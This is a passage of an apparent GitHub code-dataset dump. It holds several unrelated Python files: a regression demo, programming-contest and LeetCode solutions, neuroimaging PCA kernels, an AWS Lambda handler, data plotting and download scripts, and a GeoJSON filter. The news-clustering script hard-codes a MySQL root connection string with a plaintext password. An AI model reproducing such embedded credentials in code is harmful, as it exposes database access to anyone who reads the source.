self._right_context, self._initial_history = [], []\n        self._left_context_size = left_context_size\n        for i in range(left_context_size):\n            self._left_context.append(self._left_context_template.format(i))\n            self._initial_history.append(self._initial_history_template.format(i))\n        for j in range(right_context_size):\n            self._right_context.append(self._right_context_template.format(j))\n\n    def _initialize_sequence(self, seq):\n        \"\"\"Prepare a sequence of data points for sequence-based prediction.\n\n        Pads the sequence with dummy context, if required, and prepares the\n        prediction history.\n        \"\"\"\n        padded_seq = self._left_context + seq + self._right_context\n        history = self._initial_history[:]\n        startpos = self._left_context_size\n        return (padded_seq, history, startpos)\n","repo_name":"mbollmann/perceptron","sub_path":"mmb_perceptron/perceptron.py","file_name":"perceptron.py","file_ext":"py","file_size_in_byte":9197,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"26694937574","text":"'''\r\n    Linear Regression\r\n    General formula: y = m*x + b\r\n\r\n    Program by prokoding\r\n'''\r\nfrom statistics import mean\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom matplotlib import style\r\n\r\nstyle.use('ggplot')\r\n\r\n# data we already have\r\njam = np.array([1, 1.5, 2, 2.5, 3, 4, 5, 6, 7.5],dtype=np.float64)\r\nipk = np.array([2, 2.5, 3, 3.3, 3.4, 3.5, 3.7, 3.9, 4],dtype=np.float64)\r\n\r\nclass SimpleReg:\r\n\r\n    def __init__(self, x, y):\r\n        self.jam = x\r\n        self.ipk = y\r\n\r\n    def start(self):\r\n        m = ( ( (mean(self.jam) * mean(self.ipk)) - mean(self.jam * self.ipk)) /\r\n            ((mean(self.jam)**2) - mean(self.jam**2) ) )\r\n        \r\n        b = mean(self.ipk) - m * mean(self.jam)\r\n\r\n        return m, b\r\n\r\n    def squared_error(self, ipk_linear):\r\n        return sum((ipk_linear - self.ipk)**2)\r\n\r\n    def check_corr(self, ipk_linear):\r\n        ipk_mean = []\r\n        for i in self.ipk:\r\n            ipk_mean.append(mean(self.ipk))\r\n        se_best_fit = self.squared_error(ipk_linear)\r\n        se_mean_original = self.squared_error(ipk_mean)\r\n        return 1-(se_best_fit / se_mean_original)\r\n\r\n# use the Simple Regression classifier defined above\r\nclf = SimpleReg(jam, ipk)\r\n# get the values of m and b\r\nm, b = clf.start()\r\n# build the line from the formula y = m*x + b\r\nreg_line = []\r\nfor x in jam:\r\n    reg_line.append(m*x + b)\r\n\r\n# predict the GPA for 0.5 hours of study per day\r\nprediksi_jam = 0.5\r\nprediksi_ipk = m * prediksi_jam + b\r\nprint('Studying for ',prediksi_jam,' hours a day gives a predicted GPA of: ',round(prediksi_ipk,2))\r\n\r\n# get the correlation value\r\ncorrelation = clf.check_corr(reg_line)\r\nprint('The correlation between study time and a good GPA is: ',round(correlation,2)*100,'%')\r\n\r\n# visualize the prediction as a blue point\r\nplt.scatter(prediksi_jam, prediksi_ipk,color='b')\r\n\r\n# visualize the available data\r\nplt.scatter(jam,ipk,color = 'g')\r\n\r\n# draw the linear regression line (best-fit slope)\r\nplt.plot(jam, reg_line)\r\nplt.xlabel('Study time')\r\nplt.ylabel('GPA')\r\nplt.show()\r\n\r\n\r\n\r\n\r\n    \r\n","repo_name":"rafimchmd/Linear-Regression-1-Variabel","sub_path":"linear_reg_ipk.py","file_name":"linear_reg_ipk.py","file_ext":"py","file_size_in_byte":2124,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23559062001","text":"def getNextLargestTidy(s, length):\n    curr = int(s[0])\n    first = 
True\n idx = -1\n res = ''\n for i, n in enumerate(s[1:]):\n n = int(n)\n if n == curr and first:\n idx = i\n first = False\n if n < curr:\n if first:\n idx = i\n digit = int(s[idx]) - 1\n res = s[:idx] + str(digit) + '9' * (length - idx - 1)\n break\n if i == length - 2:\n res = s\n break\n curr = n\n res = res.lstrip('0') or '0'\n return res\n\n\ncases = int(input())\nfor c in range(1, cases + 1):\n s = input()\n length = len(s)\n res = ''\n if length < 2:\n res = s\n else:\n res = getNextLargestTidy(s, length)\n print(\"Case #{}: {}\".format(c, res))\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_200/3596.py","file_name":"3596.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"6606380726","text":"import argparse\nimport nibabel as nb\nimport numpy as np\nimport os\nimport time\nimport torch\nfrom copy import deepcopy\nimport h5py, hdf5plugin\nfrom util import create_train_idxs\n\n\ndef direct_project(y, normalizationmode, nostd=False, anon=False):\n train_ids, _ = create_train_idxs(395)\n if anon:\n mask = nb.load(\"mni_icbm152_nlin_asym_09c/mni_icbm152_t1_tal_nlin_asym_09c_headmask_defaced.nii\").get_fdata()\n else:\n mask = nb.load(\"mni_icbm152_nlin_asym_09c/mni_icbm152_t1_tal_nlin_asym_09c_headmask.nii\").get_fdata()\n mask = mask[:192,2:226,:192][None,None,:,:,:]\n mask = torch.Tensor(mask)\n \n with h5py.File(f\"icov_x_{normalizationmode}.h5\", \"r\") as hfout:\n mean = np.moveaxis(hfout[\"mean\"][:],3,0)[None,:,:,:,:].astype(np.float32)\n std = np.sqrt(np.moveaxis(hfout[\"var\"][:],3,0))[None,:,:,:,:].astype(np.float32)\n y_z = (y-mean)/(1.0 if nostd else std)\n residual = deepcopy(y_z)\n with h5py.File(f\"x_{normalizationmode}.h5\", \"r\") as hf:\n x = hf['x']\n for ii,i in enumerate(train_ids):\n print(f\"{ii},{i}\")\n xi_z = torch.Tensor((x[i].astype(np.float32)-mean)/(1.0 if nostd else std))\n xi_norm = torch.norm(xi_z*mask)\n coef = (residual*xi_z*mask).sum()/xi_norm\n print(coef)\n residual = residual - coef * xi_z/xi_norm\n #print(np.linalg.norm(residual))\n return y_z - residual, residual\n\ndef pca_project(y, normalizationmode, nostd=False):\n train_ids, _ = create_train_idxs(395)\n #train_ids = train_ids[:10]\n #kernelrow = compute_kernelrow(y, normalizationmode, nostd)\n kernelrow = compute_kernelrow_local(y, normalizationmode, nostd)\n print(kernelrow)\n with h5py.File(f\"localkernel_{normalizationmode}{'_nostd' if nostd else ''}.h5\", \"r\") as hfout:\n kernel = torch.Tensor(hfout['kernel'][0,0,0])\n kernel = kernel[train_ids,:][:,train_ids]\n eps = kernel.diagonal().mean()/10\n coefrow = torch.matmul(kernelrow[0,0,0], torch.inverse(kernel + eps*torch.eye(kernel.shape[-1])))\n projection = 0*y\n with h5py.File(f\"icov_x_{normalizationmode}.h5\", \"r\") as hfout:\n mean = np.moveaxis(hfout[\"mean\"][:],3,0)[None,:,:,:,:]\n std = np.sqrt(np.moveaxis(hfout[\"var\"][:],3,0))[None,:,:,:,:]\n y_z = (y-mean)/(1.0 if nostd else std)\n with h5py.File(f\"x_{normalizationmode}.h5\", \"r\") as hf:\n x = hf['x']\n for ii,i in enumerate(train_ids):\n print(coefrow[0,ii])\n print(ii)\n projection += coefrow[0,ii] * (x[i].astype(np.float32)-mean)/(1.0 if nostd else std)\n return projection, y_z - projection\n\ndef pca_project_test(test_ids, cuda=False):\n train_ids, _ = create_train_idxs(395)\n with h5py.File(f\"localkernel_z.h5\", \"r\") as hfout:\n kernel = torch.Tensor(hfout['kernel'][0,0,0])\n if cuda: kernel.cuda()\n kernelrows = 
kernel[test_ids,:][:,train_ids]\n kernel = kernel[train_ids,:][:,train_ids]\n eps = kernel.diagonal().mean()/10\n epseye = torch.eye(kernel.shape[-1])\n if cuda: epseye.cuda()\n coefrows = torch.matmul(kernelrows, torch.inverse(kernel + eps*epseye))\n print(coefrows)\n residuals = torch.zeros(len(test_ids),9,192,224,192)\n if cuda: residuals.cuda()\n with h5py.File(f\"icov_x_z.h5\", \"r\") as hfout:\n mean = torch.Tensor(np.moveaxis(hfout[\"mean\"][:],3,0)[None,:,:,:,:])\n std = torch.Tensor(np.sqrt(np.moveaxis(hfout[\"var\"][:],3,0))[None,:,:,:,:])\n if cuda:\n mean.cuda()\n std.cuda()\n print(\"loading h5 file\")\n with h5py.File(f\"x_z.h5\", \"r\") as hf:\n x = hf['x']\n print(\"loading test data\")\n for ii,i in enumerate(test_ids):\n print(ii)\n xi = torch.Tensor(x[i].astype(np.float32))\n if cuda: xi.cuda()\n residuals[ii] = (xi-mean)/std\n print(\"updating residuals\")\n for ii,i in enumerate(train_ids):\n xi = torch.Tensor(x[i].astype(np.float32))\n if cuda: xi.cuda()\n print(ii)\n residuals -= coefrows[:,ii].view(-1,1,1,1,1) * (xi-mean)/std\n #print((residuals**2).sum())\n return residuals\n\ndef compute_kernelrow_local(y, normalizationmode, nostd=False, anon=False):\n if anon:\n mask = nb.load(\"mni_icbm152_nlin_asym_09c/mni_icbm152_t1_tal_nlin_asym_09c_headmask_defaced.nii\").get_fdata()\n else:\n mask = nb.load(\"mni_icbm152_nlin_asym_09c/mni_icbm152_t1_tal_nlin_asym_09c_headmask.nii\").get_fdata()\n mask = mask[:192,2:226,:192][None,None,:,:,:]\n nmask = mask.sum()\n mask = torch.Tensor(mask)\n train_ids, _ = create_train_idxs(395)\n #train_ids = train_ids[:10]\n with h5py.File(f\"icov_x_{normalizationmode}.h5\", \"r\") as hfout:\n mean = np.moveaxis(hfout[\"mean\"][:],3,0)[None,:,:,:,:]\n std = np.sqrt(np.moveaxis(hfout[\"var\"][:],3,0))[None,:,:,:,:]\n y_z = (y-mean)/(1.0 if nostd else std)\n with h5py.File(f\"x_{normalizationmode}.h5\", \"r\") as hf:\n x = hf['x']\n n = len(train_ids)\n chunks = x.chunks\n kmeanrow = torch.zeros(1,1,1,1,n)\n Nmask = mask.sum()\n for i in range(x.shape[2]//x.chunks[2]):\n for j in range(x.shape[3]//x.chunks[3]):\n for k in range(x.shape[4]//x.chunks[4]):\n print([i,j,k])\n maxi = (i+1)*chunks[2]\n maxj = (j+1)*chunks[3]\n maxk = (k+1)*chunks[4]\n\n nmask = mask[:,:,\n i*x.chunks[2]:maxi,\n j*x.chunks[3]:maxj,\n k*x.chunks[4]:maxk\n ].sum()\n if nmask == 0:\n continue\n r = np.concatenate([x[ii:ii+1,:,\n i*x.chunks[2]:maxi,\n j*x.chunks[3]:maxj,\n k*x.chunks[4]:maxk\n ] for ii in train_ids], axis=0)\n r = r.astype(np.float32)\n ry = y_z[:,:,\n i*x.chunks[2]:maxi,\n j*x.chunks[3]:maxj,\n k*x.chunks[4]:maxk\n ]\n r = torch.Tensor(r)\n #mean = r.mean(dim=0, keepdim=True)\n r -= mean[:,:,\n i*x.chunks[2]:maxi,\n j*x.chunks[3]:maxj,\n k*x.chunks[4]:maxk\n ]\n #ry -= mean\n #std = r.std(dim=0, keepdim=True)\n if not nostd:\n r /= std[:,:,\n i*x.chunks[2]:maxi,\n j*x.chunks[3]:maxj,\n k*x.chunks[4]:maxk\n ]\n #ry /= std\n r = r*mask[:,:,\n i*x.chunks[2]:maxi,\n j*x.chunks[3]:maxj,\n k*x.chunks[4]:maxk\n ]\n ry = ry*mask[:,:,\n i*x.chunks[2]:maxi,\n j*x.chunks[3]:maxj,\n k*x.chunks[4]:maxk\n ]\n r = r.view(r.shape[0],-1)\n ry = ry.view(ry.shape[0],-1)\n \n localkernelrow = torch.matmul(ry, torch.transpose(r,0,1)).view(1,1,1,1,n)/nmask\n kmeanrow += localkernelrow*nmask/Nmask\n print(kmeanrow[0,0,0,0,0])\n return kmeanrow\n\ndef compute_kernelrow(y, normalizationmode, nostd=False):\n mask = nb.load(\"mni_icbm152_nlin_asym_09c/mni_icbm152_t1_tal_nlin_asym_09c_headmask.nii\").get_fdata()\n mask = mask[:192,2:226,:192][None,None,:,:,:]\n mask = 
torch.Tensor(mask)\n Nmask = mask.sum()\n train_ids, _ = create_train_idxs(395)\n with h5py.File(f\"icov_x_{normalizationmode}.h5\", \"r\") as hfout:\n mean = np.moveaxis(hfout[\"mean\"][:],3,0)[None,:,:,:,:]\n std = np.sqrt(np.moveaxis(hfout[\"var\"][:],3,0))[None,:,:,:,:]\n yz = (y-mean)\n if not nostd:\n yz /= std\n with h5py.File(f\"x_{normalizationmode}.h5\", \"r\") as hf:\n x = hf['x']\n kmeanrow = torch.zeros(1,1,1,1,len(train_ids))\n for i in train_ids:\n print(i)\n xi = torch.Tensor((x[i].astype(np.float32)-mean)/(1.0 if nostd else std))\n kmeanrow[0,0,0,0,i] = torch.sum((yz*xi)*mask/Nmask)\n print(kmeanrow[0,0,0,0,i])\n return kmeanrow\n \n\ndef main2(args):\n mask = nb.load(\"mni_icbm152_nlin_asym_09c/mni_icbm152_t1_tal_nlin_asym_09c_headmask.nii\").get_fdata()\n mask = mask[:192,2:226,:192][None,None,:,:,:]\n Nmask = mask.sum()\n mask = torch.Tensor(mask)\n with h5py.File(f\"icov_x_{args.normalizationmode}.h5\", \"r\") as hfout:\n mean = np.moveaxis(hfout[\"mean\"][:],3,0)[None,:,:,:,:]\n std = np.sqrt(np.moveaxis(hfout[\"var\"][:],3,0))[None,:,:,:,:]\n with h5py.File(f\"x_{args.normalizationmode}.h5\", \"r\") as hf:\n with h5py.File(f\"localkernel_{args.normalizationmode}{'_nostd' if args.nostd else ''}.h5\", \"w\") as hfout:\n x = hf['x']\n n = x.shape[0]\n chunks = x.chunks\n kmean = torch.zeros(1,1,1,n,n)\n for i in range(x.shape[2]//x.chunks[2]):\n for j in range(x.shape[3]//x.chunks[3]):\n for k in range(x.shape[4]//x.chunks[4]):\n print([i,j,k])\n maxi = (i+1)*chunks[2]\n maxj = (j+1)*chunks[3]\n maxk = (k+1)*chunks[4]\n\n nmask = mask[:,:,\n i*x.chunks[2]:maxi,\n j*x.chunks[3]:maxj,\n k*x.chunks[4]:maxk\n ].sum()\n if nmask > 0:\n r = x[:,:,\n i*x.chunks[2]:maxi,\n j*x.chunks[3]:maxj,\n k*x.chunks[4]:maxk\n ].astype(np.float32)\n r = torch.Tensor(r)\n r -= mean[:,:,\n i*x.chunks[2]:maxi,\n j*x.chunks[3]:maxj,\n k*x.chunks[4]:maxk\n ]\n if not args.nostd:\n r /= std[:,:,\n i*x.chunks[2]:maxi,\n j*x.chunks[3]:maxj,\n k*x.chunks[4]:maxk\n ]\n #mean = r.mean(dim=0, keepdim=True)\n #r -= mean\n #print(mean[0,:,0,0,0])\n #std = r.std(dim=0, keepdim=True)\n #r /= std\n r = r*mask[:,:,\n i*x.chunks[2]:maxi,\n j*x.chunks[3]:maxj,\n k*x.chunks[4]:maxk\n ]\n r = r.view(r.shape[0],-1)\n localkernel = torch.matmul(r, torch.transpose(r,0,1)).view(1,1,1,n,n)/nmask\n kmean += localkernel*nmask/Nmask\n #print(kmean)\n else:\n localkernel = torch.zeros(1,1,1,n,n)\n if i==0 and j==0 and k==0:\n hfout.create_dataset('localkernel', data = localkernel.cpu().numpy().astype(np.float32), \n dtype=np.float32, chunks=(1,1,1,n,n) ,\n maxshape=(*(x.chunks[2:]), n, n), **hdf5plugin.Blosc())\n else:\n s = hfout[\"localkernel\"].shape\n hfout[\"localkernel\"].resize((max(i+1,s[0]),max(j+1,s[1]),max(k+1,s[2]),n,n))\n hfout[\"localkernel\"][i:i+1,j:j+1,k:k+1] = localkernel.cpu().numpy().astype(np.float32)\n hfout.create_dataset('kernel', data=kmean.cpu().numpy().astype(np.float32), dtype=np.float32, **hdf5plugin.Blosc())\n \nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description=\"parse args\")\n\n parser.add_argument('-n','--normalizationmode', default=\"z\", type=str, help='normalization mode')\n\n parser.add_argument('--nostd', action='store_true', default=False, help='whether not to divide by std')\n \n args = parser.parse_args()\n print(args)\n main2(args)","repo_name":"vsaase/simpleBAD","sub_path":"pcakernel.py","file_name":"pcakernel.py","file_ext":"py","file_size_in_byte":12762,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"61"} 
+{"seq_id":"8694342521","text":" \nfrom example2jira import *\n\n\nlist = [ {\"file\" : \"legend1\",\n\t \"data\" : [\"z500.grb\", \"t850.grb\"],\n \"title\" : \"Vertical legend with user defined text\"},\n\t {\"file\" : \"legend2\",\n \"data\" : [\"t850.grb\"],\n\t \"title\" : \"Disjoint legend with user defined labels\"},\n\t {\"file\" : \"legend3\",\n \"data\" : [\"z500.grb\", \"t850.grb\"],\n \"title\" : \"Positional and histogram legend\"} ]\n\nprepare(\"legend.json\", list, \"Legend examples\")\n\nput(\"legend.json\", \"Legend examples\", \"Legend examples\")\n\n\n\n\n","repo_name":"adanese88/magics","sub_path":"docs/confluence/legend/tojira.py","file_name":"tojira.py","file_ext":"py","file_size_in_byte":518,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"61"} +{"seq_id":"4911761358","text":"import os\nimport uuid\nimport json\nimport boto3\nfrom decimal import Decimal\n\n#conecta com a tabela do bd\ndef conect_db():\n table_name = os.environ['TABLE']\n region = os.environ['REGION']\n aws_environment = os.environ['AWSENV']\n db_conection = os.environ['DBLOCALURL']\n \n # Check if executing locally or on AWS, and configure DynamoDB connection accordingly.\n if aws_environment == \"AWS_SAM_LOCAL\":\n table = boto3.resource('dynamodb', endpoint_url=db_conection).Table(table_name)\n \n else:\n # AWS\n table = boto3.resource('dynamodb', region_name=region).Table(table_name)\n \n return table\n\n\ndef lambda_handler(event, context):\n \n try:\n\n items = json.loads(event['body'], parse_float=Decimal)\n\n product_table = conect_db()\n\n if event['path'] == \"/inventory/add-products/\":\n \n if items['id'] and items['nome'] and items[\"valor\"] and items[\"quantidade\"] and items['ativo']:\n \n product_table.put_item(Item=items)\n \n response = {\n \"statusCode\": 200,\n \"body\": json.dumps(f'Produto cadastrado!')}\n\n else:\n msg = ''\n\n for key,item in items.items():\n try:\n if item['id'] and item['nome'] and item[\"valor\"] and item[\"quantidade\"] and item['ativo']: \n product_table.put_item(Item=item)\n msg += f\"item {key} cadastrado, \" \n \n except:\n msg += f\"item {key} invalido, \"\n\n response = {\n \"statusCode\": 200,\n \"body\": json.dumps(msg)}\n except:\n response = {\n \"statusCode\": 400,\n \"body\": json.dumps(f'Bad request!')}\n\n return response\n","repo_name":"David-Marcoss/MyShop-AWS-Serverless-Microsservices","sub_path":"Inventory_api/Inventory-app/src/AddProductFunction/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1853,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"2068482467","text":"import matplotlib.pyplot as plt\nimport pandas as pd \nimport numpy as np\nfrom matplotlib import colors as mcolors\nimport random\nimport time\n\ntoday = time.strftime(\"%m/%d/%Y\")[1:][:-2]\n\ndf = pd.read_csv('data/latest.csv')\n\ndf_sum = df\n#uniq = df['Country/Region'].unique()\nuniq = ['US']\ndf_final = pd.DataFrame()\nnumber_of_days = 5\n\nfor country in uniq:\n country_code = df['Country/Region']==country\n df_coutry = df[country_code]\n df_coutry = df_coutry.sort_values(by=[today], ascending=False)\n df_coutry = df_coutry.head(10)\n \n column_list = list(df_coutry)\n column_list.remove('Country/Region')\n column_list.remove('Lat')\n column_list.remove('Long')\n \n dfToBeT = df_coutry[column_list]\n dfToBeT = dfToBeT.groupby(['Province/State']).sum()\n print(dfToBeT)\n dfT = dfToBeT.T\n dfT['date'] = dfT.index \n dfT = dfT[-number_of_days:]\n print(dfT)\n 
column_list_T = list(dfT)\n column_list_T.remove('date')\n\n column_val = {}\n for column in column_list_T:\n column_val[column] = dfT[column][today]\n\n sorted_column_val = sorted(column_val.items(), key=lambda x: x[1], reverse=True)\n\n colors = dict(mcolors.BASE_COLORS, **mcolors.CSS4_COLORS)\n colors_to_draw = []\n\n for color in mcolors.TABLEAU_COLORS:\n colors_to_draw.append(color)\n\n index = 0\n final_column_list = []\n for i in range(len(sorted_column_val)):\n final_column_list.append(sorted_column_val[i][0])\n \n for column in final_column_list:\n plt.plot( 'date' , column, data=dfT, marker='', color=colors_to_draw[index], linewidth=2, label=column)\n plt.legend()\n index = index + 1\n plt.show()\n","repo_name":"sumitbahl/coronavirusdailyreport","sub_path":"coronavirus_daily_visualizer.py","file_name":"coronavirus_daily_visualizer.py","file_ext":"py","file_size_in_byte":1670,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"38536618853","text":"import subprocess\nimport pandas as pd\nimport sys\nimport os\n\npath_runinfo = sys.argv[1]\noutput_path = sys.argv[2]\ndf_runinfo = pd.read_csv(path_runinfo)\nfor index, row in df_runinfo.iterrows():\n if row[\"SampleName\"] in [\"GSM4455935\", \"GSM4455933\"]:\n specific_output = os.path.join(output_path, row[\"SampleName\"])\n if not os.path.isdir(specific_output):\n os.mkdir(specific_output)\n wget_process = subprocess.Popen([\"wget\", \"-P\", specific_output, row[\"download_path\"]])\n wget_process.wait()\n\n","repo_name":"olopade-lab/COMIRI","sub_path":"WIP/download_sra.py","file_name":"download_sra.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"43144257920","text":"#monotonic function\n#binary serach O(nlogn)\n#more the maximum value of banana considered, less the number of hours required\n#so monotonic, we can apply bs..\n\n\n# do check it \\U0001f447\n#EXACTLY SAME AS : https://leetcode.com/problems/minimized-maximum-of-products-distributed-to-any-store/\n# also see : https://leetcode.com/problems/heaters/\n\n\n'''\n# minimise maximum, so we return do hi = mid for valid case, and return low\n\n# if it was maximise minimum, then we will do li = mid +1 for valid case and return li - 1\n# keep something extra in r...bcz (l H: return False\n return True\n\n'''\n\nvery important ques\nalso see: https://www.lintcode.com/problem/848/description\n\n\nclass Solution {\npublic:\n double minmaxGasDist(vector &s, int k) {\n // Write your code here\n double l = 0;\n double r = s.back() - s[0];\n double ans = r;\n while(l + 0.000001 < r){\n double m = l + (r-l)/2.0;\n //cout<&s , int k){\n int c = 0; // total number of gas station needed to have max distance as m\n for(int i = 1;ik){\n return false; // bcz we need c stations to keep maximum distance as m, but we are allowed only k, so some part of stance will be more than m , thus we wont have maximum as m\n }\n else{\n return true;\n }\n \n }\n};\n\n\n'''","repo_name":"hardik302001/leetcode","sub_path":"problems/koko_eating_bananas/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":2893,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"27086929631","text":"class Solution:\n def longestStrChain(self, words: List[str]) -> int:\n memo, word_set = {}, set(words)\n def dfs(word):\n if len(word) == 1: return 1\n if word in memo: return memo[word]\n 
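# Illustrative trace (words made up, not from the input): dfs(\"bca\") tries\n            # the one-character deletions \"ca\", \"ba\" and \"bc\"; each deletion present in\n            # word_set is recursed into, so dfs returns 1 + the best child result.\n            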
rslt = 0\n for i in range(len(word)):\n if word[:i] + word[i+1:] in word_set:\n rslt = max(rslt, dfs(word[:i] + word[i+1:]))\n memo[word] = rslt + 1\n return rslt + 1\n rslt = 0\n for word in words[::-1]:\n rslt = max(rslt, dfs(word))\n return rslt\n","repo_name":"Mela2014/lc_punch","sub_path":"lc1048_dfs.py","file_name":"lc1048_dfs.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5449527393","text":"\nprint()\nlista=[]\nx=(int(input(\"Introduca con un número la cantidad de palabras que desea insertar en la lista del programa: \")))\nprint()\nfor i in range(x):\n lista.append(input(\"Introduzca una palabra: \"))\n\nlista_invertida=[]\nfor elem in lista:\n lista_invertida.append(elem[::-1])\n\ndef inversas(lista): \n lista_inv_2=[]\n for word in lista:\n if word in lista_invertida:\n lista_inv_2.append(word)\n return lista_inv_2\n\nprint(\"\\nLas palabras inversas ingresadas son: \")\nprint(inversas(lista))\nprint(\"\\n Programa Finalizado...\\n\")\n","repo_name":"jose137sp/lab3-py","sub_path":"problema4.py","file_name":"problema4.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"34719804756","text":"from sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\nfrom collections import Counter\n\nfrom nltk.corpus import stopwords\nfrom nltk.tokenize import word_tokenize\n\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.metrics.pairwise import cosine_similarity\n\nimport sys\nsys.path.append('..')\nfrom modals import Base, Article, Cluster\n\ndb_url = \"mysql://root:Hunter1?23@localhost/newsapp?charset=utf8&use_unicode=0\"\n\nengine = create_engine(db_url, echo=False)\n\n#Base.metadata.drop_all(engine)\nBase.metadata.create_all(engine)\n\nSession = sessionmaker(bind=engine)\nsession = Session()\n\nstop_words = set(stopwords.words('english'))\n\nclusters = session.query(Cluster).all()\nfor cluster in clusters:\n articles = cluster.articles\n article_titles = [a.title for a in articles]\n \n vectorizer = CountVectorizer()\n article_vectors = vectorizer.fit_transform(article_titles)\n \n word_counts = [len(t) for t in article_titles]\n max_word_count = max(word_counts)\n min_word_count = min(word_counts)\n\n articles_ages = [(cluster.last_updated - a.date_created).total_seconds() / 3600 for a in articles]\n max_article_age = max(articles_ages)\n min_article_age = min(articles_ages)\n\n if len(articles) > 2:\n for i, article in enumerate(articles):\n # calculate normalized article age\n article_age = (articles_ages[i] - min_article_age) / (max_article_age - min_article_age)\n print(1 - article_age)\n #print(\"Time Difference: \" + str(time_difference))\n \n # get similarity between article and other articles\n \n sims = cosine_similarity(article_vectors[i], article_vectors)[0]\n avg_sim = sum(sims) / len(sims)\n #print(\"avg sim: \" + str(avg_sim))\n\n # calculate normalized word count\n word_count = (word_counts[i] - min_word_count) / (max_word_count - min_word_count)\n #print(\"word count: \" + str(word_count))\n \n score = ((1 - word_count) * .5) + avg_sim + (1 - article_age)\n\n print(f\"{article.title}: {score}\")\n # Kool - calculus, physics\n # SIDES - french\n print(\"\\n\")\n \"\"\"\n articles = cluster.articles\n if len(articles) > 2:\n titles = []\n for a in articles:\n titles.append(a.title.decode('utf-8').lower())\n \n word_tokens = 
word_tokenize(' '.join(titles))\n\n        filtered_words = [w for w in word_tokens if not w in stop_words and len(w)>2]\n\n        c = Counter(filtered_words)\n        ordered_words = c.most_common()\n        \n        for a in articles:\n            title_text = a.title.decode('utf8').lower()\n            score = 0\n            for w, f in ordered_words:\n                score += title_text.count(w) * (f - 1)\n            score = score / (len(title_text.split()) / 2)\n            print(str(a.title) + \" - \" + str(score))\n        \n        #for word, freq in ordered_words:\n        #    print(word)\n        \n        \n        \n        print(\"\\n\\n\")\n    \"\"\" \n# get top keywords from all titles\n# number of keywords included / # of words in title\n\n\n","repo_name":"Grocode87/news.api2","sub_path":"Uploader/top_article/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3190,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"22751876270","text":"import ijson\nfrom shapely.geometry import shape, Point\n\nf = open('render_geojson/data//S_USA.AdministrativeForest/usa.geojson')#LNDCVR_California_State_Shape(1)/Shape/LandCover_Woodland3.geojson')\nobjects = ijson.items(f, 'features.item')\noutput = open(\"final.geo.json\", \"w+\")\ngeometry = (o for o in objects)\nprint(\"here\") \noutput_features = []\n# points.pts holds all the points we work with; there are 10000 of them\npoints_file = open('points.pts').read()\npoints = points_file.split(\",\")\n# point = Point( -121.5000000, 37.5000000)\n# points = [point]\n# since the geojson is very large, I tried to keep only the polygons that contain these 10k points\n# that logic came out wrong: I could not find those polygons\n# in short, the remaining problem is simply to find the terrain type at these 10k points\nfor point in points:\n\tprint(point)\n\tcurr = point.replace(\"[\", \"\").replace(\"]\", \"\").split(\"; \")\n\ttemp_point = Point(-105.86660302, 37.4499334)#Point( float(curr[0]), float(curr[1]))\n\tis_found = 0\n\tfor feature in output_features:\n\t\t# print(feature)\n\t\tpolygon = shape(feature['geometry'])\n\t\tif polygon.contains(temp_point):\n\t\t\tis_found = 1\n\tif is_found:\n\t\tcontinue\n\tfor feature in geometry:\n\t\t# print(feature['geometry']['coordinates'][0][0])\n\t\tpolygon = shape(feature['geometry'])\n\t\t# here the contains method simply returns true or false\n\t\tif polygon.contains(temp_point):\n\t\t\tprint(\"found one\")\n\t\t\toutput_features.append(feature)\nprint(output_features)\noutput.write(str(output_features))\n \n \n\n# import json\n# # depending on your version, use: from shapely.geometry import shape, Point\n\n# # load GeoJSON file containing sectors\n# with open('LNDCVR_California_State_Shape(1)/Shape/LandCover_Woodland3.geojson') as f:\n#     js = json.load(f)\n\n# # construct point based on lon/lat returned by geocoder\n# print(\"we're starting...\")\n# # check each polygon to see if it contains the point\n# for feature in js['features']:\n","repo_name":"adilnaut/firesim","sub_path":"wxwidget/scripts/polygonfilter.py","file_name":"polygonfilter.py","file_ext":"py","file_size_in_byte":2171,"program_lang":"python","lang":"ru","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"38063695272","text":"# ------------------------------------------------------\n# Problem 1\n# ------------------------------------------------------\nimport math\nimport random\nimport pumpkin_display\nimport matplotlib.pyplot as plt\nimport cisc106\n\n# Global Constants\nSCREEN_WIDTH = pumpkin_display.SCREEN_WIDTH\nSCREEN_HEIGHT = pumpkin_display.SCREEN_HEIGHT\n# Add your global constants here\nSCREEN_WIDTH = 
